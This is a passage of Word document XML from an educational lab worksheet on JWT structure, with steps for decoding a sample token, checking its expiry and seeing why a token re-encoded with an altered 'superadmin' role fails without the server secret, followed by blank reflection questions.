                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Note whether it says 'EXPIRED'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Calculate: when was the expiry date?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Is this token expired? What does that mean for security?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Understand the Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Count the dots in the token</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Identify which part is Header, Payload, Signature</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Note what colour each section is</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2840"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Could you decode the Header and Payload yourself? Try pasting at jwt.io</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b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Modify the Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1. In the payload editor, change "role" to "superadmin"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Click  ⚙️ Re-encode Token</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Read the output carefully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">What happens to the signature? Can this new token be used?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Try the Admin Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Click  ☠️ Try Role: admin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Read the output message</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Understand WHY this fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2840"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">What is missing from this forged token? What would an attacker need to make it valid?</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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Click  🔐 Verify Structure</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Read each check that passes or fails</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Note the expiry warning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Which checks pass and which fail? What does each check actually verify?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Reflection — Write Your Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">After decoding the sample token, what information does the payload contain?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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Answer:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The token has an exp (expiry) timestamp. What is the date this token expired?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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Answer:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When you re-encoded with role: 'superadmin', the output says 'SIGNATURE_NEEDS_SERVER_SECRET'. Explain what this means in your own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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Answer:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Could you use the re-encoded token to actually access an API? Why or why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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Answer:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
